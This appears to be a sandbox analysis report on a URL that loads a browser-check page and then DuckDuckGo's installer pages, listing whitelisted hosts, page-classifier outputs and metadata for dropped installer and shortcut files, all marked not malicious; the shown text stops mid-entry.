                                                                                                                                                            • Browse: https://chrome.google.com/webstore/detail/duckduckgo-privacy-essent/bkdgflcldnnnapblkhphbgpggdiikppg
                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.184.238, 142.251.168.84, 34.104.35.123, 2.23.209.187, 2.23.209.133, 2.23.209.149, 2.23.209.130, 2.23.209.182, 2.23.209.140, 172.202.163.200, 199.232.210.172, 192.229.221.95, 13.85.23.206, 216.58.212.170, 142.250.185.170, 142.250.186.138, 216.58.206.42, 172.217.23.106, 142.250.181.234, 142.250.186.74, 142.250.186.106, 142.250.184.234, 142.250.185.106, 142.250.186.42, 142.250.185.74, 142.250.185.202, 142.250.186.170, 142.250.185.234, 142.250.185.138, 20.12.23.50, 142.250.184.195, 142.250.186.35, 216.58.206.35, 172.217.16.202, 172.217.18.10, 216.58.212.138, 142.250.184.202, 216.58.206.74, 20.109.210.53, 172.217.16.136, 142.250.185.99, 142.250.185.174
                                                                                                                                                            • Excluded domains from analysis (whitelisted): ssl.gstatic.com, slscr.update.microsoft.com, otelrules.afd.azureedge.net, clientservices.googleapis.com, clients2.google.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, ocsp.digicert.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, www.gstatic.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.google-analytics.com, www.bing.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, ogads-pa.googleapis.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com
                                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                            No simulations
                                                                                                                                                            InputOutput
                                                                                                                                                            URL: https://gzevp.castragouse.com/fzFA/ Model: jbxai
                                                                                                                                                            {
                                                                                                                                                            "brand":["Cloudflare"],
                                                                                                                                                            "contains_trigger_text":false,
                                                                                                                                                            "trigger_text":"",
                                                                                                                                                            "prominent_button_name":"unknown",
                                                                                                                                                            "text_input_field_labels":"unknown",
                                                                                                                                                            "pdf_icon_visible":false,
                                                                                                                                                            "has_visible_captcha":false,
                                                                                                                                                            "has_urgent_text":false,
                                                                                                                                                            "text":"Verifying... Implementing browser checks to maintain a safe connection.",
                                                                                                                                                            "has_visible_qrcode":false}
                                                                                                                                                            URL: https://duckduckgo.com/ Model: jbxai
                                                                                                                                                            {
                                                                                                                                                            "brand":["DuckDuckGo"],
                                                                                                                                                            "contains_trigger_text":false,
                                                                                                                                                            "trigger_text":"",
                                                                                                                                                            "prominent_button_name":"Download Browser",
                                                                                                                                                            "text_input_field_labels":["Get Privacy Pro!",
                                                                                                                                                            "VPN + 2 more protections in 1 subscription."],
                                                                                                                                                            "pdf_icon_visible":false,
                                                                                                                                                            "has_visible_captcha":false,
                                                                                                                                                            "has_urgent_text":false,
                                                                                                                                                            "text":"Switch to DuckDuckGo. It's private and free!",
                                                                                                                                                            "has_visible_qrcode":false}
                                                                                                                                                            URL: https://duckduckgo.com/#features Model: jbxai
                                                                                                                                                            {
                                                                                                                                                            "brand":["DuckDuckGo"],
                                                                                                                                                            "contains_trigger_text":false,
                                                                                                                                                            "trigger_text":"",
                                                                                                                                                            "prominent_button_name":"Download DuckDuckGo Browser",
                                                                                                                                                            "text_input_field_labels":["unknown"],
                                                                                                                                                            "pdf_icon_visible":false,
                                                                                                                                                            "has_visible_captcha":false,
                                                                                                                                                            "has_urgent_text":false,
                                                                                                                                                            "text":"Free. Fast. Private. Get our browser on all your devices. Search and browse more privately with the DuckDuckGo browser. Unlike Chrome and other browsers,
                                                                                                                                                             we don't track you.",
                                                                                                                                                            "has_visible_qrcode":false}
                                                                                                                                                            URL: https://duckduckgo.com/windows?origin=funnel_home___details Model: jbxai
                                                                                                                                                            {
                                                                                                                                                            "brand":["DuckDuckGo"],
                                                                                                                                                            "contains_trigger_text":false,
                                                                                                                                                            "trigger_text":"",
                                                                                                                                                            "prominent_button_name":"Select Install",
                                                                                                                                                            "text_input_field_labels":["Open DuckDuckGo Installer in Downloads",
                                                                                                                                                            "That's it!",
                                                                                                                                                            "Install DuckDuckGo Privacy App?"],
                                                                                                                                                            "pdf_icon_visible":false,
                                                                                                                                                            "has_visible_captcha":false,
                                                                                                                                                            "has_urgent_text":false,
                                                                                                                                                            "text":"Downloading Finalize setup to use our private and secure browser. Search privately & block trackers Block annoying cookie pop-ups Watch YouTube without targeted ads Hide your email address",
                                                                                                                                                            "has_visible_qrcode":false}
                                                                                                                                                            No context
                                                                                                                                                            No context
                                                                                                                                                            No context
                                                                                                                                                            No context
                                                                                                                                                            No context
                                                                                                                                                            Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):768
                                                                                                                                                            Entropy (8bit):5.600886389690732
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:MMHddXOtPItOX9slNQXc44+Do9XbeSqxWPh/JpMZrYDU5dBmwBeC8eckJsooTsnZ:JdVOO+G+c44+cbNh/sVYDk8dkJsouk64
                                                                                                                                                            MD5:D0351CBCCE42015CD1627F7E8CD10B9C
                                                                                                                                                            SHA1:E43B9B51B2417BA2CFC44D9D1915037C5226A3E7
                                                                                                                                                            SHA-256:EB8F25250DC1D190B9FB345904358A624B9F213F1CA1FB1476CC6D520332B357
                                                                                                                                                            SHA-512:9D357E9CF0A2C9F43B620AD19BD78556344D6D198BE4FB7839A43FD18C9078349ED30D3CE4DF7B2D23412B4C9C6ED847F725F926512A6C4AEB8D0B7AB1A4940F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.<?xml version="1.0" encoding="utf-8"?>..<AppInstaller...Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/installer/funnel_home___details/DuckDuckGo.appinstaller"...Version="0.90.3.0" xmlns="http://schemas.microsoft.com/appx/appinstaller/2017/2">...<MainBundle....Name="DuckDuckGo.DesktopBrowser"....Version="0.90.3.0"....Publisher="CN=&quot;Duck Duck Go, Inc.&quot;, OU=Engineering, O=&quot;Duck Duck Go, Inc.&quot;, L=Paoli, S=Pennsylvania, C=US, SERIALNUMBER=5019303, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US"....Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle" />..</AppInstaller> ..
                                                                                                                                                            Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (65480), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):470115
                                                                                                                                                            Entropy (8bit):5.913355857147862
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:xolNDMiR39sq/hCom11nxvkbW1NM9zDbA4vqFH+l9u4B2FmpX0dmAh6a+VGeSp+B:xoXhCogTfCXbZkH+lTBRt/YdzfjS
                                                                                                                                                            MD5:B594C17B96016BBF7F5DEB4F4A8D7E38
                                                                                                                                                            SHA1:7FF4A5DDD6B912FE0F66002BC9F4CCE7F9634B73
                                                                                                                                                            SHA-256:E186EDF1D06623876826EAF6C1AA8142D0453E17FBBC6DFBA0B909BC51075519
                                                                                                                                                            SHA-512:DAE8ED4F6AD5F49CD3F6D68144CE4F0B5CED8D9C5C3B944D725E2C670D8BB1C8FA2ADEDBF7687BF2265B4617C50D511F767FF8103229EE9779D53DC2DF3A2CE8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<BlockMap xmlns="http://schemas.microsoft.com/appx/2010/blockmap" HashMethod="http://www.w3.org/2001/04/xmlenc#sha256"><File Name="WindowsBrowser\sni.dll" Size="136488" LfhSize="52"><Block Hash="idY42X3jdgkwvZDZI/XTFsFQ5x4ZJEaFcbqshiqjXJA=" Size="37440"/><Block Hash="joi25xUewJelkoY3MQJRdAwXQvx2R40nNLlJiAkw6Ig=" Size="32878"/><Block Hash="mOKVHcHHXrzrlBX2f15aO6AYEca/0NU6an1Nl9u8ipI=" Size="3591"/></File><File Name="WindowsBrowser\it\Microsoft.VisualStudio.Validation.resources.dll" Size="13672" LfhSize="95"><Block Hash="5nBkEYYUaO5JLc8I6x2FFA3uAb8kltAeUiuboAuLVrM=" Size="7336"/></File><File Name="WindowsBrowser\zh-Hant\Microsoft.VisualStudio.Validation.resources.dll" Size="13672" LfhSize="100"><Block Hash="3wn3zJYQMOBU6AxAHr1wZsmMh+qa7G9fZG8rUyfnDmY=" Size="7342"/></File><File Name="WindowsBrowser\es\Microsoft.VisualStudio.Validation.resources.dll" Size="13672" LfhSize="95"><Block Hash="f05ICo11SBDy0Vgl2irxNN3Qrg63jMvfaMfj+C3ECOQ="
                                                                                                                                                            Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):338
                                                                                                                                                            Entropy (8bit):5.494854902005539
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:TMVBd6OjlB84mUA+DGdic4scLGPaOHAw/0so9oEGueu62Cfo2xKoOv8b:TMHdtn4+DycL6gwvo+EGx2CQmKLvK
                                                                                                                                                            MD5:DEAEA7B2840702B19A6D73BC649EB23C
                                                                                                                                                            SHA1:3FF6668C478F81F5C8F03EEE930D6162A7856583
                                                                                                                                                            SHA-256:67725479453B1B477C820F597A78C8233F49B7ADAFAECE88B8B1823FBD2A8B51
                                                                                                                                                            SHA-512:5EBE92B5C3B315A67312BBF2C40E120CED36FA9031CAFCBA2FE934866F8983DD93931E8D10AE152E3C9E72CF8C8F62108B1475E17AF8DA091C4B33066852F2CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<BlockMap xmlns="http://schemas.microsoft.com/appx/2010/blockmap" HashMethod="http://www.w3.org/2001/04/xmlenc#sha256"><File Name="AppxMetadata\AppxBundleManifest.xml" Size="1627" LfhSize="65"><Block Hash="1pPK5HF/nHeONB/en2HYzEkdSstjsFG0iLcDgzO6Zd4=" Size="589"/></File></BlockMap>
                                                                                                                                                            Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12307
                                                                                                                                                            Entropy (8bit):7.670533980864976
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:dHE8DbnPIIYiYF8mo9eaOq1AwkVRepA5K+o/y2sE9jBF0Ny1ahRlWA:B3HQIYiUalkfUAM+o/8E9VF0NyYTcA
                                                                                                                                                            MD5:C52DF45011647D85C87C9F46743943DB
                                                                                                                                                            SHA1:BCD2F07D88664FEF06EFDA0037EEDD0563742C93
                                                                                                                                                            SHA-256:389A77327F345FCF901BA3C08618432019108BC8AB354488D97C4D50C7E85016
                                                                                                                                                            SHA-512:73D7C5754E1AE090E260FAFDD019749E22F741C04876A3FA00D1DA15D47096519935C0FB2A5DEF30B39576C94522C52A19AD0A906B36617113FFB4768BD086E9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:PKCX0.0...*.H......../.0./....1.0...`.H.e......0....+.....7......0..05..+.....7...0'.........X_...K.4.t-..................0..0...`.H.e.........APPXAXPC..w@S..u.;..>*..!{./..j...*m.%.AXCD<#O...........h.....GI5...j.=.<AXCT0T.@.?....e.........#.(-.R....AXBMgrTyE;.G|..Yzx.#?I........?.*.Q...\0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~..
                                                                                                                                                            Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (320), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1627
                                                                                                                                                            Entropy (8bit):5.540936983122749
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:c3w5dgzskJsoktREr87M3Fa9BErj87M3Fa9A9:75dYRJs597M1kU87M1k2
                                                                                                                                                            MD5:7AFA4CD11F374E6E8BFCDE8881703ECC
                                                                                                                                                            SHA1:B4190DF0E8A51735BFE4BEA5AF4B0D52C008E296
                                                                                                                                                            SHA-256:D693CAE4717F9C778E341FDE9F61D8CC491D4ACB63B051B488B7038333BA65DE
                                                                                                                                                            SHA-512:789F0F917D457EC5789AD75F252BBAEF45D67283121E26507653E985F5E375BEC6F31D4AAAA6155E00E1CE9DA7D5C8A1DB9271BA5A105DB86154514A34F2F3D2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<Bundle SchemaVersion="5.0" IgnorableNamespaces="b4 b5" xmlns="http://schemas.microsoft.com/appx/2013/bundle" xmlns:b4="http://schemas.microsoft.com/appx/2018/bundle" xmlns:b5="http://schemas.microsoft.com/appx/2019/bundle">...<Identity Name="DuckDuckGo.DesktopBrowser" Publisher="CN=&quot;Duck Duck Go, Inc.&quot;, OU=Engineering, O=&quot;Duck Duck Go, Inc.&quot;, L=Paoli, S=Pennsylvania, C=US, SERIALNUMBER=5019303, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US" Version="0.90.3.0"/>...<Packages>....<Package Type="application" Version="0.90.3.0" Architecture="x86" FileName="DuckDuckGo_0.90.3.0_x86.msix" Offset="477038971" Size="435565165">.....<Resources>......<Resource Language="EN-US"/>.....</Resources>.....<b4:Dependencies>......<b4:TargetDeviceFamily Name="Windows.Universal" MinVersion="10.0.19041.0" MaxVersionTested="10.0.19041.0"/>......<b4:TargetDeviceFamily Name="Wi
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 8 02:08:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2677
                                                                                                                                                            Entropy (8bit):3.9777451803201878
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8zdsTQUTH7idAKZdA19ehwiZUklqehwtfy+3:86HZnfy
                                                                                                                                                            MD5:BC74292FFC3C55870646EAA94FCBD894
                                                                                                                                                            SHA1:1EA593FF78B1AF8825FC411E806BD82BD14E6C51
                                                                                                                                                            SHA-256:BA6B61BD042F4DD9D8F9249EBB3F29A9B42D4FED48CE93D162BD2BA59BF366E8
                                                                                                                                                            SHA-512:AB4497100754E1F79AB256038BCB435981E81514A207BB9D643704586C40F58673F0EB17A7F9324E6321FA34A18EA9AA2A1C643109864BC98C3D4D245BF52AAD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:L..................F.@.. ...$+.,.......]/...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IHY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VHY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VHY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VHY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VHY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........}..>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 8 02:08:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2679
                                                                                                                                                            Entropy (8bit):3.9928407983002923
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8WdsTQUTH7idAKZdA1weh/iZUkAQkqehFtfy+2:8NHL9QSfy
                                                                                                                                                            MD5:FB1CA38AD06D477DF2E7EC77723E798B
                                                                                                                                                            SHA1:B1BE61319239A2D21D3D73FA857D61C7AE97FAF2
                                                                                                                                                            SHA-256:2B0853B0563960F92AC6BDB1D0DF033F5CEE138B92D1E4B55A2A78B65C96AA52
                                                                                                                                                            SHA-512:EA28D398E6F549F77CCB68940CBA649B67F6879B29288B68E3ACC1802EEC15B2446DD2EFBED152598AA7E063EED62DDF682DAE115676FD35CA6FFB33EB39A513
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:L..................F.@.. ...$+.,.......]/...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IHY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VHY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VHY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VHY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VHY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........}..>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2693
                                                                                                                                                            Entropy (8bit):4.0043126570382155
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8x9dsTQUsH7idAKZdA14tseh7sFiZUkmgqeh7s7tfy+BX:8x8Hqnbfy
                                                                                                                                                            MD5:E7C3E7031768ACAA19C032C99E520E9B
                                                                                                                                                            SHA1:5917035E847206F8A497B0A0670CB912FCD7B164
                                                                                                                                                            SHA-256:74C9ABED55AFEBDC598AC03BA2FCD61A5369A8B9D2979B8D0A7D54B16428B8F2
                                                                                                                                                            SHA-512:57FB39C0A6035577F826B45E4F4CA239B58CE35966C3CAA4466B033308BE2F4462881E336E3920D6DEF4E576B10D76E25B34FCA99C42B24CD88DBFA4CB59BFC8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IHY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VHY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VHY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VHY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........}..>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 8 02:08:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2681
                                                                                                                                                            Entropy (8bit):3.992235498860309
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8B+dsTQUTH7idAKZdA1vehDiZUkwqehJtfy+R:8bHIRfy
                                                                                                                                                            MD5:F7DE1F916A3C184A5DE359703F82C11D
                                                                                                                                                            SHA1:68747B4F4C4CE7A0329A85CEC6C45F7E71EACA63
                                                                                                                                                            SHA-256:1F7C7F878D9BD84443089F5990CD9D40FA754E6DEDC68386BA9FFCCD58F27BFA
                                                                                                                                                            SHA-512:6A9E2F0940F543DABCE802E43AA18E32C27DD70E136F779CC930CD4B698F73BA4A233A941DE8C5492E0EACAFBBF3ADBBFFD193C57FB0C055C7D86306C89031E5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:L..................F.@.. ...$+.,.....*{]/...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IHY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VHY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VHY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VHY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VHY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........}..>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 8 02:08:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2681
                                                                                                                                                            Entropy (8bit):3.980486596807073
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8UdsTQUTH7idAKZdA1hehBiZUk1W1qehHtfy+C:87HY9tfy
                                                                                                                                                            MD5:C55DF020C0F6D4E76F6AC83CB65B602E
                                                                                                                                                            SHA1:11E36E55C015E084038013B910855A7042430ABC
                                                                                                                                                            SHA-256:FE760757154D2800D9F1B018ABE86E2B29688D6FF35265F709A0AFFE051E2597
                                                                                                                                                            SHA-512:490E7A4640096A6663D024E36CF6E31630ABD724D5773C4FD1EC39F883A904E8820A1F81B2495D29BD6FC10BE27C9FA0DDF64892A2EBF0E0737CD54ABB355830
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:L..................F.@.. ...$+.,....7.]/...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IHY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VHY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VHY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VHY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VHY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........}..>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 8 02:08:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2683
                                                                                                                                                            Entropy (8bit):3.989699027147086
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8tdsTQUTH7idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbxtfy+yT+:8MH2T/TbxWOvTbbfy7T
                                                                                                                                                            MD5:9D061451100032DABD31B734ABEF9B01
                                                                                                                                                            SHA1:F9F0D668E4FF2839ABAA0BBA805409B5305269AB
